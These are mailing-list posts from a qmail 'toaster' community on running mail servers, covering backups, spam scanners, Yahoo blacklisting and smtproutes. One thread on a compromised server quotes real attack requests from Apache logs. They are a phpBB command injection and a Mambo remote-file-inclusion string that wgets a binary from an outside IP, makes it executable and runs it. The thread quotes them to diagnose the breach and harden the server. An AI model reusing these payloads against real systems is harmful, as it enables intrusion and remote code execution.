Re: [toaster] Toaster compromised? Or system?

2006-02-10 Thread Peter Maag
Take a look through your Apache logs to see the URL call they used to exploit the /tmp directory. Try searching for strings like: 'wget' or 'ftp' within your apache access logs. Chances are you will uncover the cuplrit script.

Judging by the permissions in the files in your /tmp directory they most likely did not get root on the box. In the future I would recommend chmod'ing the following executables to 700:

If you can get away with chmoding perl to 700 that will help things also. Due to the permission settings on this files, they had to have executed the script with: perl

Check out mod_security for Apache as well.

On 2/10/06, David [EMAIL PROTECTED] wrote:
Rick Macdougall wrote: David wrote: *warning long email* Hi all,
 We have been running a Shupp toaster for about 18 months on a Redhat 9 box, and the other day it appears it was compromised by spammers. I thought if I posted a few things I found about the system drive
 perhaps someone might be able to help me figure out how/how to prevent this... apache 32499 324980 Feb08 ?S0:00\_ perl /tmp/dc.txt 67.159.2
 apache 32503 324990 Feb08 ?S0:00\_ /bin/bash Hi, I believe that is the xmlprc exploit against apache/php (could be the phpbb exploit, but I'm pretty sure the 
dc.txt is part of the xmlrpc). Upgrade your php and apache, find the xmlrpc.php in question and fix it. You can then use a tool like qmail-remove to clean out the queue. Regards,
 Rick !DSPAM:43ec99dc204751732444004!Thanks Rick,I'm running php 4.3.10 and I can't find any information about a xmlrpcexploit; I also can't find any entries in my logs about 
dc.txt. I willkeep looking.Thanks,David.

Re: [toaster] Toaster compromised? Or system?

2006-02-10 Thread Peter Maag
I would personally setup mod_security as well. It should stop most of these types of attacks right away with default settings.

On 2/10/06, David [EMAIL PROTECTED] wrote:
Bill Shupp wrote: David wrote: Thanks Peter - reassuring to know that someone else thinks they probably
 didn't get root... I have been watching ps and netstat -p and haven't seen anything suspicious, nor seen any more rogue messages in my mail queue... fingers crossed :) I have plans to replace this box ASAP however.
 I uncovered this in the apache logs: ./www.myvirtualhost.domain-access_log: - - [25/Jul/2005:21:32:12 +0930] GET /store/phpbb2/viewtopic.php?t=2rush=%
 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa% 3B%20%65%63%68%6F%20%5F%45%4E%44%5Fhighlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
 3%68%5D%29.%2527 HTTP/1.1 200 21138 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
 system weathered that one. Closer to date is: ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error] [client] request failed: erroneous characters aft
 er protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http: //;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
 HTTP\\x01.1 But it looks like that one failed. Oh well time to update php and clean out a few old phpbb installs. Thanks all for your help. David
 A few things I always run into with PHP that are popular: 1) Make sure PHPBB is the latest version and not exploitable.I used to allow my clients to install it, but every few months, SOMEONE would
 install an old exploitable version.I've switched to using debian's PHPBB package, and just point clients to it so I don't have to keep track of it anymore.I just run security updates daily instead on all
 packages.Haven't been exploited since. 2) Keep register_globals off, and only turn it on as needed. 3) Make sure allow_url_fopen is set to OFF.This is a very popular one, and in my experience tends to attract DDoS attackes rather than a mail
 exploit.But costs you expensive bandwitdth nonetheless. Regards, Bill !DSPAM:43ecbcde224031625613092!Cheers Bill, register_globals always off, but now I will probably
disable url file operations too. Perhaps just enable them on a per-sitesettingDavid

Re: [toaster] Qmail - how to backup all mails?

2004-12-07 Thread Peter Maag
Hi KS,
This should work...
From your shell prompt:

vpopmailctl stop
qmailctl stop
mkdir /var/src/qmail_backup
cp /home/vpopmail/domains/ /var/src/qmail_backup/ -R

Should grab all of the e-mails, as they are stored in: /home/vpopmail/domains/

Good luck!


On Tue, 07 Dec 2004 18:22:33 +0100, Krzysztof Syguda
 Does somebody know how to backup all incoming and outgoing mail for
 domain (or toaster server) or CC of all incoming and outgoing mail to one
///  / Krzysztof Syguda
    \\\  \ tel.  +48 607223304
   e-mail: [EMAIL PROTECTED]
 Thought for the day:
 The only thing that hurts more than paying income tax
 is not having to pay income tax.

Re: [toaster] Yahoo Domain Keys

2004-11-18 Thread Peter Maag
I did notice that, and I was contemplating not even posting the link
on this list, as I for one absolutely hate how Yahoo insists on
running their abuse and postmaster departments.

However, as an ISP we need to deal with the way(terrible) Yahoo is
dealing with tagging messages as SPAM.



On Thu, 18 Nov 2004 11:13:08 +0200, Boris Pavlov [EMAIL PROTECTED] wrote:
 Peter Maag wrote:
  To Bill and the List,
  I wanted to bring everyone's attention to Yahoo's new version of
  stopping SPAM, domainkeys(
  Basically it is their version of
 maybe this is (a part of) the reason
 any lawyer to check it out? at first glance it is a just some protective
 measure against a patent infringement claim against any Implementation
  SPF (why they don't just use SPF is beyond me), and there is a qmail
  patch available:
  Will this patch work with the toaster, or do we need to roll something

Re: [toaster] simscan

2004-10-01 Thread Peter Maag
Thanks for looking into this a little moreIt sounds like an awesome 
replacement to qmailscanner, and will certainly limit the queue filling 
up from bounces to invalid domains, etc.

a.h.s. boy (lists) wrote:
On Sep 29, 2004, at 7:24 PM, Bill Shupp wrote:
a.h.s. boy (lists) wrote:
So it sounds like you can just set the simscan rejection level very 
high, like 30, and it will only reject the mail over that threshold. 
If SpamAssassin's own threshold setting can be different (like 7), 
then SA will still mark the mail as Spam, and simscan will allow it 
to pass through.

That's how I read it.  I plan to test simscan soon.  Right now it's 
failing, and strace is not helping, but I have not tested it much 
yet.  I'll report back when I have.

I got a response from Ken Jones. Sounds like we have it right:
With spamassassin enabled --enable-spam the email is passed through
spamassassin with all it's associated headers. If the email is marked as
spam then it is rejected. All other emails pass through with the 
headers intact.

With --enable-spam-hits=number then only email above this hit count is
rejected. All other email is passed through including email marked as 
The idea was to only reject really bad spam and let the user filter 
the rest.

a.h.s. boy
spud(at)nothingness.orgas yes is to if,love is to yes

Re: [toaster] simscan

2004-09-29 Thread Peter Maag
Bill and Tom,
Thanks for the replies.  I don't think I was very clear in my first 
message.  I would like ClamAV to scan and block at the SMTP level, but 
have SpamAssassin run as it normally does with QmailScanner, after the 
message has already been accepted.  From briefly looking over simscan, 
it looks like it does support SpamAssassin based filtering, however it 
will only work at the SMTP level and will block messages that reach the 
score threshold.
Am I stuck with using simscan and qmailscanner?

Bill Shupp wrote:
Peter Maag wrote:
It looks good to us, however we don't want to reject based on 
SpamAssassin results.  Right now we use qmailscanner, which does slow 
things down quite a bit and a C alternative that does a SMTP deny 
based on ClamAV, and not SpamAssassin would be preferred.  Anyone 
know of a solution that would work?

This will do exactly that.  SpamAssassin blocking is optional.  
There's also qscanq:  But it's a bit more complicated 
to get working correctly, and I've had problems with it on FreeBSD.  
Also, qscanq does NOT do attachment blocking.

If you require SpamAssassin scanning at the smtp level, you should 
look into qmail-spamc, which is a simple C program to call first 
spamc, then qmail-queue.  You could manually add this to your chan 
AFTER simscan, either editing the qmail-queue call from simscan 
manually, or using symlinks.


Re: [toaster] stunnel and redhat enterprise 3.0

2004-09-29 Thread Peter Maag
We have had the same problem with a Redhat 9 machine of ours.  We have 
just kept stunnel at 3.x , would also like to know how to get things 
operational with stunnel 4.x

Jason 'XenoPhage' Frisvold wrote:
Hi all,
   I just determined that pop3ds is not working at all here...  
Apparently the script calls several parameters for stunnel that are no 
longer available in stunnel?  I have the stock pop3ds run file from 
the toaster which assumes stunnel 3.x ...  I'm running stunnel 4.x ...

Anyone know how to set this up for stunnel 4.x ??

Re: [toaster] not sending

2004-09-29 Thread Peter Maag
Try doing a:
   cat /var/log/qmail/smtpd/current
   cat /var/log/qmail/current
These are the log files associated with most qmail deliveries and are 
usually quite helpful in letting you know exactly what is going on.

Hope this helps,
Noel Sanchez wrote:
I setup a new toaster and don't know why I can't send emails from Outlook.
When I do qmailctl I get following:

[EMAIL PROTECTED] root]# qmailctl stat
/service/qmail-send: up (pid 1723) 762 seconds
/service/qmail-send/log: up (pid 1725) 762 seconds
/service/qmail-smtpd: up (pid 1719) 762 seconds
/service/qmail-smtpd/log: up (pid 1731) 762 seconds
messages in queue: 8130
messages in queue but not yet preprocessed: 0
Also, when I do a ps -aux I see many emails waiting to be sent but aren't
being sent. Any ideas?
qmailr6029  0.0  0.3  4412  836 ?S12:12   0:00
qmail-remote [EMAIL PROTECTED]
qmailr6078  0.0  0.3  4472  840 ?S12:12   0:00
qmail-remote [EMAIL PROTECTED]
qmailr6188  0.0  0.3  4796  836 ?S12:12   0:00
qmail-remote ohv0q.rbdq
qmailr6204  0.0  0.3  5028  840 ?S12:12   0:00
qmail-remote [EMAIL PROTECTED]
qmailr6217  0.0  0.3  4604  848 ?S12:13   0:00
qmail-remote [EMAIL PROTECTED]
qmailr6229  0.0  0.3  5184  840 ?S12:13   0:00
qmail-remote 6uimecdrk
qmailr6231  0.0  0.3  4212  844 ?S12:13   0:00
qmail-remote 6uimecdrk
qmailr6236  0.0  0.3  4040  836 ?S12:13   0:00
qmail-remote 6uim
qmailr6238  0.0  0.3  4772  840 ?S12:13   0:00
qmail-remote 6uimecdrk

Re: [toaster] not sending

2004-09-29 Thread Peter Maag

What are the IP's of the mail server? I would shut down the port 25
forward to see if that slows things down. Make sure you followed the
toaster install instructions correctly, as you may have forgotten to
stop the server functioning as an open relay.

Noel Sanchez wrote:

  I don't understand, I looked at those 2 log files and this is a portion of
it, The messages in the queue keep increasing fast. It seems like this
mail server is being used for spam? This is a new toaster on Fedora core2
behind a linux firewall with ports 80, 25, and 110 being forwarded to the
mail server. Could it be a computer thats infected with something? The
mail that is being sent is not coming from here, no one is sending out
that stuff...

@4000415b44b03aea448c tcpserver: status: 12/20
@4000415b44b03aea6b9c tcpserver: pid 6893 from
@4000415b44b03aea830c tcpserver: ok 6893 0:
@4000415b44b1003fc244 tcpserver: end 6879 status 0
@4000415b44b1003ff124 tcpserver: status: 11/20
@4000415b44b10f5f2864 tcpserver: status: 12/20
@4000415b44b10f69cb0c tcpserver: pid 6896 from
@4000415b44b10f6e0ce4 tcpserver: ok 6896 0:
@4000415b44b302a1b6b4 tcpserver: end 6893 status 0
@4000415b44b302a1d9dc tcpserver: status: 11/20
@4000415b44b3130ef1c4 tcpserver: status: 12/20
@4000415b44b3130f18d4 tcpserver: pid 6907 from
@4000415b44b3130f3044 tcpserver: ok 6907 0:
@4000415b44b31a093304 tcpserver: end 6896 status 0
@4000415b44b31a09562c tcpserver: status: 11/20
@4000415b44b52065d89c tcpserver: end 6907 status 0
@4000415b44b52065ffac tcpserver: status: 10/20
@4000415b44b5226e6a3c tcpserver: end 6876 status 0
@4000415b44b5226e897c tcpserver: status: 9/20
@4000415b44b52f3f6bbc tcpserver: status: 10/20
@4000415b44b52f3f96b4 tcpserver: pid 6924 from
@4000415b44b52f3fae24 tcpserver: ok 6924 0:
@4000415b44b52f3fc97c tcpserver: status: 11/20
@4000415b44b52f3fdd04 tcpserver: pid 6925 from
@4000415b44b52f3ff08c tcpserver: ok 6925 0:
@4000415b44b6352aec7c tcpserver: status: 12/20
@4000415b44b6352b1774 tcpserver: pid 6930 from
@4000415b44b6352b2ee4 tcpserver: ok 6930 0:
@4000415b44b71dbc5bac tcpserver: end 6925 status 0
@4000415b44b71dbc86a4 tcpserver: status: 11/20
@4000415b44b730521824 tcpserver: status: 12/20
@4000415b44b73052431c tcpserver: pid 6943 from
@4000415b44b730525a8c tcpserver: ok 6943 0:

and the other log file:

@4000415b44ec0044affc info msg 349855: bytes 2556 from
[EMAIL PROTECTED] qp 7251 uid 89
@4000415b44ec0db0bce4 delivery : success:
@4000415b44ec0db0efac status: local 0/10 remote 19/20
@4000415b44ec0db1071c end msg 347963
@4000415b44ec0dbd76b4 starting delivery 1116: msg 346923 to remote
@4000415b44ec0dbd99dc status: local 0/10 remote 20/20
@4000415b44ec0ebe21bc new msg 349862
@4000415b44ec0ebe4cb4 info msg 349862: bytes 3728 from [EMAIL PROTECTED]
qp 7253 uid 89
@4000415b44ed10c8499c new msg 346929
@4000415b44ed10c87494 info msg 346929: bytes 7234 from
[EMAIL PROTECTED] qp 7258 uid 89
@4000415b44ed391e853c delivery 1114: success:
@4000415b44ed391ebfd4 status: local 0/10 remote 19/20
@4000415b44ed391ed744 starting delivery 1117: msg 346923 to remote
@4000415b44ed391ef29c status: local 0/10 remote 20/20
@4000415b44ed391f0624 end msg 347956
@4000415b44ed3af51614 new msg 349863
@4000415b44ed3af5410c info msg 349863: bytes 7229 from
[EMAIL PROTECTED] qp 7260 uid 89
@4000415b44ee1363e7c4 delivery 1110: success:
@4000415b44ee13641a8c status: local 0/10 remote 19/20
@4000415b44ee13642e14 starting delivery 1118: msg 346923 to remote
@4000415b44ee1364496c status: local 0/10 remote 20/20
@4000415b44ee136460dc end msg 347955
@4000415b44ee2258231c delivery 1106: success:,_ready_to_proceed./
@4000415b44ee22585db4 status: local 0/10 remote 19/20
@4000415b44ee22587524 starting delivery 1119: msg 346923 to remote
@4000415b44ee2258907c status: local 0/10 remote 20/20

Try doing a:
cat /var/log/qmail/smtpd/current
cat /var/log/qmail/current

These are the log files associated with most qmail deliveries and are
usually quite helpful in 

Re: [toaster] Hotmail is recieving mail in junk box

2004-09-21 Thread Peter Maag
Looks like you may have gotten a bad ip block from your provider.  You 
can run a test on your IP by going to: .  There 
is a box at the very top, middle column that says: Spam Database Lookup 
.  Put your IP in there and run the test, it will show you which 
Blacklists currently have you listed.  Hopefully you arn't the one 
sending SPAM, and you can somehow convince them to unblacklist you.

Good luck,
saki wrote:
  Thank you for your reply. As like hotmail this
problem is arising when user send mail to
Qmail reply it :
  @4000414ebf192faaacc4 new msg
@4000414ebf192faac81c info msg 97866: bytes 907
from [EMAIL PROTECTED] qp 2470 uid 89
@4000414ebf19306722dc starting delivery 13: msg
97866 to remote [EMAIL PROTECTED]
@4000414ebf1930695d2c status: local 0/10 remote
@4000414ebf2032f2b3a4 delivery 13: deferral:
Connected_to_204.97.230.38_but_greeting_failed./Remote_host_said:_558_Your_network_address_is_blacklisted,_this_means_that_your_network_range_or_your_server_is_in_our_blacklist._If_you_think_you_were_added_by_mistake,[EMAIL PROTECTED],_please_make_sure_your_outgoing_server_is_smtp.gawab.com_(#5.7.1)/
@4000414ebf2032f3348c status: local 0/10 remote
So I think there is certain clue between hotmail and
 With best wishes 


--- Peter Maag [EMAIL PROTECTED] wrote:

Yes, quite frustrating isn't it?  As Bill mentioned
we were having a 
similar problem with Yahoo! recently, and are less
than impressed with 
their postmaster department.  Yahoo! has a form
buried deep in their 
site that they will send you to fill out if you are
being blacklisted.  
Filled it out, and never got a response so we were
finally forced to 
change the IPs of our SMTP servers.  No good.

The cause of the problem was the story I posted in
the link that Bill 
provided.  Our users had setup forwards from the
domain we were hosting 
to their Yahoo! accounts.  SPAM would come through
hit our servers, our 
servers would send it on it's way, and our users
would mark it as SPAM 
in their Yahoo! inbox.  Yahoo! started noticing
quite a few SPAM 
complaints because of this, and started to blacklist
us.   Not much you 
can do about that, except setup SPF and pray.

I would URGE everyone here who has a fair amount of
users to signup with 
AOL's Postmaster department on their whitelist
service. , heck even give them a
call and they will get 
everything setup for you!  It is a pleasant
departure from the bad rep 
AOL has always received.

As for Hotmail, after looking through their website
it appears as if 
they have a phone number dedicated to these types of
1-650-964-7200 , which was found on the very very
bottom of this page:

Good luck!

Bill Shupp wrote:

saki wrote:

--- saki [EMAIL PROTECTED] wrote:


Hello all,
 I have installed qmail successfuly


to BILL's guide. My server send mail to yahoo


successfuly. But when i send message qmail reply


[EMAIL PROTECTED] root]# tail -f /var/log/qmail/current
@4000414d9f4612105614 new msg 97975
@4000414d9f461210716c info msg 97975: bytes


from [EMAIL PROTECTED] qp 2370 uid 0
@4000414d9f46125ca154 starting delivery 2:


97975 to remote [EMAIL PROTECTED]
@4000414d9f46125cb8c4 status: local 0/10


@4000414d9f4f1e33e53c delivery 2: success:
[EMAIL PROTECTED]_Queued_mail_for_delivery/


and hotmail catch the mail in junk box. Why it's
on ? any one could help me?

Check out this thread on a similar situation with

Yahoo:[EMAIL PROTECTED]/msg01730.html



Do you Yahoo!?
New and Improved Yahoo! Mail - 100MB free storage! 


Re: [toaster] cgi-bin

2004-09-21 Thread Peter Maag
You most likely have incorrect permissions set on the qmailadmin cgi 
file, or your Apache installation does not include support for cgi 
related programs.  You will need to setup your cgi-bin as your 
ScriptAlias directory in your httpd.conf .  Check 
for details on setting that directive up, and other CGI related problems.
Hope this helps,

Nezinu wrote:
I read your instructions how to make a mailserver and all did fine, 
only at the end of document something went wrong.
The problem is that when i open it 
says me to save or open this file and not open same page. Or trying to 
change some configs i get simply page not found..
help me..

Re: [toaster] Forwarding and SPAM Question

2004-08-19 Thread Peter Maag
Thanks for the tip.  Are there any smarthosts that one can pay for to 
send mail to Yahoo?  How does one selectively route e-mail out of qmail 
to alternate smtp servers?

Eero Volotinen wrote:
Peter Maag kirjoitti:
Bill and everyone else,
I finally managed to get around Yahoo! filtering all e-mail from our 
SMTP IP address for the time being.  Here is what I feel is 
happening, and really don't know if there is a solution:

Use smarthost to relay mail to yahoo.

Re: [toaster] Yahoo Filtering and SMTP Routes

2004-08-18 Thread Peter Maag
About to do this switchover as you described.  I looked through the 
QMail docs and can't tell if putting the smtproutes information in the 
server will stop mail from being delivered locally.  For instance, the 
server that is being filtered by Yahoo is also the primary MX for the 
related domains.  So for instance, say [EMAIL PROTECTED] receives an 
e-mail to this blocked SMTP server.  Since the config has been placed in 
the smtproute file wouldn't that message be forwarded on to my temporary 
external SMTP server?

I hope this is clear.
Thanks for the help,
Peter Maag wrote:
It seems that they have not implemented SPF as of yet, because we have 
SPF records on all of our domains.
I will try the solution you posted and will get back to you guys.  It 
seems that Yahoo does not have ANY contact information with their 
postmaster department, as customer care has no clue what an SMTP 
server even is!

Bill Shupp wrote:
Peter Maag wrote:
Hey All,
Recently for some reason our customers have been complaining that 
mail forwarded or sent to their Yahoo accounts is being 
automatically deposited into their Bulk Mail folders.  Contacting 
Yahoo! has been an uphill battle, and after numerous phone calls and 
e-mails to try and get to talk to someone with a clue we are giving 
up on them.  Each of our SMTP servers has reverse DNS enabled and 
functioning correctly.  We are on clean IPs, and none of the IPs are 
listed in any RBL or Blacklist.

Have they implemented SPF?
I would like to leave our current SMTP servers intact and simply 
have them forward any mail they receive from our clients to yet 
another SMTP server that we operate on an entirely separate 
network.  This would only be temporary until we get Yahoo to 
actually tell us what is going on.

How would you accomplish this with qmail?

in /var/qmail/control/smtproutes and hup qmail-send (replacing 
ipoftempsmtpserver with the actual IP).  And make sure that the new 
smtp server has your current smtp server setup as RELAYCLIENT.


[toaster] Forwarding and SPAM Question

2004-08-18 Thread Peter Maag
Bill and everyone else,
I finally managed to get around Yahoo! filtering all e-mail from our 
SMTP IP address for the time being.  Here is what I feel is happening, 
and really don't know if there is a solution:

   Users with their own domain names use our e-mail services to forward 
messages to their Yahoo! and AOL accounts.  Lets say Jim has the domain: hosted with us.  Jim decides that the Yahoo! account he 
has is the best thing sliced bread, and figures that he should just have 
all e-mail from forwarded to his Yahoo! account.  Not a 
problem!  He logs into qmailadmin, sets up the forward and everything is 
merry!  Not so fast, Jim has had since the advent of DNS 
and his e-mail address has made it's rounds on spam lists, etc, etc, so 
Jim gets quite a large amount of SPAM on a daily basis. 

   This SPAM hits our SMTP server, gets forwarded to Yahoo and placed 
in Jim's INBOX just like it should.  Jim takes one look at: [EMAIL PROTECTED]@x 
CHeaPEr oNLINE and instantly flags it as SPAM in his Yahoo account.  He 
does this with every spam e-mail he receives, and pretty soon Yahoo! 
takes a look at the headers and realizes that our SMTP servers are 
responsible for sending quite a bit of SPAM to Jim.  Our servers get 
blocked, and Jim instantly complains that his Aunt Janice's really 
important e-mail got moved to his Bulk folder and he missed some 
important correspondence.

Natuarally, you can see the problem here.  We are getting our IP ranges 
marked in providers blacklists due to e-mail forwarding that we are 
doing on behalf of our customers.  Is there anyway around this besides 
calling each customer and educating them about what they are doing?

AOL has a great program with their SPF implementation, feedback loop, 
and whitelisting.  I never thought I would say this, but AOL's 
postmaster department has a great website, and even greater postmaster 
customer service reps.  Yahoo's is a nightmare and I have a feeling the 
people that can unblock an IP range sit locked away somewhere with no 
lines to the outside.

As a provider this is extremely frustrating, as we constantly have to 
tread lightly with Yahoo!

Any ideas/suggestions are greatly appreciated.

Re: [toaster] Yahoo Filtering and SMTP Routes

2004-08-13 Thread Peter Maag
It seems that they have not implemented SPF as of yet, because we have 
SPF records on all of our domains.
I will try the solution you posted and will get back to you guys.  It 
seems that Yahoo does not have ANY contact information with their 
postmaster department, as customer care has no clue what an SMTP server 
even is!

Bill Shupp wrote:
Peter Maag wrote:
Hey All,
Recently for some reason our customers have been complaining that 
mail forwarded or sent to their Yahoo accounts is being automatically 
deposited into their Bulk Mail folders.  Contacting Yahoo! has been 
an uphill battle, and after numerous phone calls and e-mails to try 
and get to talk to someone with a clue we are giving up on them.  
Each of our SMTP servers has reverse DNS enabled and functioning 
correctly.  We are on clean IPs, and none of the IPs are listed in 
any RBL or Blacklist.

Have they implemented SPF?
I would like to leave our current SMTP servers intact and simply have 
them forward any mail they receive from our clients to yet another 
SMTP server that we operate on an entirely separate network.  This 
would only be temporary until we get Yahoo to actually tell us what 
is going on.

How would you accomplish this with qmail?

in /var/qmail/control/smtproutes and hup qmail-send (replacing 
ipoftempsmtpserver with the actual IP).  And make sure that the new 
smtp server has your current smtp server setup as RELAYCLIENT.


Re: [toaster] Suggestions for improving performance

2004-05-24 Thread Peter Maag

I wasn't that specific in my original post, and for that I apologize.
Our setup is configured like I mentioned, except for the fact that our
primary mail server(the one with the vpopmail accounts) is configured
as a backup MX in our DNS zones. This way if our primary scanner goes
down mail is still delivered correctly.

However, having our primary mail server as a secondary MX in DNS opened
up a few other problems...It seems that a lot of viruses and bulk
mailer programs are written to deliver their nasty mail to all MX
records for a domain, or simply deliver the mail to the backup MX
servers. It looks like they realized what we are trying to do, get the
scanning off of our primary mail server and onto a dumb machine that
simply scans e-mails all day. The solution is pretty elegant really,
but is not entirely scalable. With help from Bill, we figured out how
to scan messages selectively based on where they were coming from.

Any messages being sent from our scanner machine are not scanned by our
primary mail server, as, obviously they have been scanned by the
scanner machine. Now, if the primary mail server gets a message from
somewhere else besides the scanner machine we set QMAILQUEUE to
qmailscanner and the message is scanned. We still benefit from
improved performance, and do not have problems delivering mail to picky
ISP's like AOL.

The downside to this system is that we need to keep spamassassin/clamav
current on two machines, but we have noticed a good performance
increase with this system...As 99% of all legitimate e-mails are sent
to the MX record with the highest priority, which is our scanner

Hope this helps,

Darrell Strong wrote:

  I was reading your post from Shupp
toaster page (see below) and was wondering how you resolved the aol
problem that is associated with having your gateway email server on
your mx record and not your true email server. 
  I have my setup just like you
mentioned below. It works great but i just realized that AOL is sending
all incoming mail we are sending it to the aol users spam folder.
Evidently AOL is assuming all incoming mail from my mailserver is spam
because it is originating from my mail server which is no longer at my
mx record ip address. Therefore there is no reverse dns record for it. 
  Outgoing mail goes out directly out
from my mailserver, bypassing the gateway. Did you have this problem?
Should I route all outgoing mail back thru the gateway? Any help you
could provide would be appreciated. Thanks 
  " Jeff, 
We had a similar problem, and our bottleneck was SpamAssassin and Clam
Scanner. We ended up putting SpamAssassin and Clamd on a seperate
machine that simply scanned the incoming messages and passed them onto
the primary mail machine that housed the vpopmail accounts, etc. 
  All you need to do is install
Bill's toaster on a second machine with Qmailscanner, SpamAssassin,
etc, etc. and then setup that machine to forward all mail to your
primary box in /var/qmail/control/smtproutes 
  Works like a charm, just make sure
DNS points to the scanning server in the MX route. 
  Darrell Strong 
Technology Coordinator 
Haddon Heights Public Schools 
(856) 547-0521 

Re: [toaster] Suggestions for improving performance

2004-05-24 Thread Peter Maag

Honestly I am not sure how you would go about sending e-mails through
your scanning machine.Hopefully someone else from the list will
respond with the answer.




thanks for getting back to me so quickly. I may need to reroute outgoing
AOL mail thru the gateway email server. I attempted this yesterday by
creating an smtproutes file and adding "" . The
gateway sent me a message back telling me that:

Remote host said: 553 sorry, that domain isn't in my list of allowed
rcpthosts; no valid cert for gatewaying (#5.7.1)

I guess I need to refigure out how to tell the gateway to send msgs from
aol on to their destination, which isn't on that machine. Do you know a
simple way to do that from the gateway? Do I need to edit the rcpthosts
file? This would seem to be opening a can of worms but I'm not sure.

Any help would be appreciated.


Darrell Strong

I wasn't that specific in my original post, and for that I apologize.
Our setup is configured like I mentioned, except for the fact that our
primary mail server(the one with the vpopmail accounts) is configured
as a backup MX in our DNS zones.  This way if our primary scanner goes
down mail is still delivered correctly.

However, having our primary mail server as a secondary MX in DNS opened
up a few other problems...It seems that a lot of viruses and bulk
mailer programs are written to deliver their nasty mail to all MX
records for a domain, or simply deliver the mail to the backup MX
servers.  It looks like they realized what we are trying to do, get the
scanning off of our primary mail server and onto a dumb machine that
simply scans e-mails all day.  The solution is pretty elegant really,
but is not entirely scalable.  With help from Bill, we figured out how
to scan messages selectively based on where they were coming from.

Any messages being sent from our scanner machine are not scanned by our
primary mail server, as, obviously they have been scanned by the
scanner machine.  Now, if the primary mail server gets a message from
somewhere else besides the scanner machine we set QMAILQUEUE to
qmailscanner and the message is scanned.  We still benefit from
improved performance, and do not have problems delivering mail to picky
ISP's like AOL.

The downside to this system is that we need to keep spamassassin/clamav
current on two machines, but we have noticed a good performance
increase with this system...As 99% of all legitimate e-mails are sent
to the MX record with the highest priority, which is our scanner

Hope this helps,

Darrell Strong wrote:

  I was reading your post from Shupp
toaster page (see below) and was wondering how you resolved the aol
problem that is associated with having your gateway email server on
your mx record and not your true email server.
  I have my setup just like you
mentioned below. It works great but i just realized that AOL is sending
all incoming mail we are sending it to the aol users spam folder.
Evidently AOL is assuming all incoming mail from my mailserver is spam
because it is originating from my mail server which is no longer at my
mx record ip address. Therefore there is no reverse dns record for it.
  Outgoing mail goes out directly out
from my mailserver, bypassing the gateway. Did you have this problem?
Should I route all outgoing mail back thru the gateway? Any help you
could provide would be appreciated. Thanks
  " Jeff,
We had a similar problem, and our bottleneck was SpamAssassin and Clam
Scanner. We ended up putting SpamAssassin and Clamd on a seperate
machine that simply scanned the incoming messages and passed them onto
the primary mail machine that housed the vpopmail accounts, etc.
  All you need to do is install
Bill's toaster on a second machine with Qmailscanner, SpamAssassin,
etc, etc. and then setup that machine to forward all mail to your
primary box in /var/qmail/control/smtproutes
  Works like a charm, just make sure
DNS points to the scanning server in the MX route.
  Darrell Strong
Technology Coordinator
Haddon Heights Public Schools
(856) 547-0521


Darrell Strong
Technology Coordinator
Haddon Heights Public Schools


[toaster] Multiple Domains Same Users

2004-03-06 Thread Peter Maag
   Hey All,
Not sure if there is an elegant solution to this with QMail, but I am 
curious.  Say I have a user john who has the e-mail address: 
[EMAIL PROTECTED]  , john registers another domain, and would 
like all e-mail hitting domain2 to be sent to [EMAIL PROTECTED] .  But, if 
john adds more users to: he would like them to propogate over 
to without having to do any more configuration.

   Any ideas?


Re: [toaster] controlling size of attachments

2004-02-27 Thread Peter Maag
That functionality is built into QMail.  Edit/Create the file: 

Enter a value in there in bytes(i.e. my max is 5MB so it reads: 500)

   Thats it!


Jeff Koch wrote:

Does anyone know of a patch that would allow the mailserver to reject 
emails/attachments over a certain size?

Best Regards,

Jeff Koch

Re: [toaster] Removing Bounced Mail Attachment

2004-01-12 Thread Peter Maag
I spent some time researching this a little bit further and found this 
Any ideas on how that would affect a toaster installation?



Bill Shupp wrote:

Peter Maag wrote:

   To The List,
We are co-locating our MTA's and have a specific commitment with our 
colo provider.  We are billed on 95%'tile and have been having 
problems recently with people attempting to send very large 
attachments to clients on our machines.

Recently one user decided it would be a good idea to send a 100MB 
attachment to a user, the message was bounced using the databytes 
file in /var/qmail/control.

However, I noticed that QMail downloads the message completely, and 
then bounces it with the attachment.  As you can imagine, if multiple 
users are doing this it tends to raise our bandwidth usage considerably.

Do any of you know how to reject an e-mail with a huge attachment, 
without forwarding the orig. message including the attachment?

   Thanks for the help,

I'm not aware of one.  If you find one, let me know and I'll check it 



[toaster] Strange SMTP Problem

2003-10-23 Thread Peter Maag
   To The List,
I have a new server that is using Bill's 0.5 patch and vpopmail and 
MySQL.Everything works just great, POP3 authenticates fine, and the 
username is added to the allowed relay table in the database.

I first started noticing problems when I started to try and send mail 
via the server, after authenticating with POP3.  My mail client(Mozilla 
Thunderbird) seems to pause on Delivering Mail mode.  If I don't click 
cancel, the Delivering Mail window stays up indefinitly.  Using 
netstat on the server shows an open SMTP session from the client, 
however no new mail is being listed in /var/log/qmail/current ...  The 
message never makes it to the queue.

This got me thinking, so I POP'd into the server and then opened up 
telnet to try and send a message by hand.  The server responds as 
anticipated until I try to exit the data portion of the message with 
the period(.) command. The server does not end the message there, but 
continues onto a new line.There is no real way to exit the data 
portion of the message!

Anyone have a problem similar to this one?  Thanks,


RE: [toaster] HELP...Toaster only accepting smtp connects from localhost :(

2003-06-19 Thread Peter Maag
Who is your ISP?  Recently Cox, and others have started blocking
outgoing port 25 connections to everything except for their servers.
This would be a pretty good explanation as to why it suddenly stopped
working.  Hope this helps,


-Original Message-
From: Charles Jones [mailto:[EMAIL PROTECTED] 
Sent: Thursday, June 19, 2003 10:17 PM
Subject: [toaster] HELP...Toaster only accepting smtp connects from
localhost :(

First I would like to say thanks for putting together such an easy to
install package.  The directions were concise and the end result was my
toaster was up and working great.

But it isn't.  Here are the symptoms:

I can connect to anything from localhost, including webmail.  I can use
sqwebmail to send a message to myself and I get it.  I can telnet to
localhost 25 and the smtpd responds.  However telnetting to it from
outside the network fails (IT WAS WORKING YESTERDAY!).

I'm hoping I have provided enough info here that should help someone
spot my
problem. If you need to know anything else just say the word.

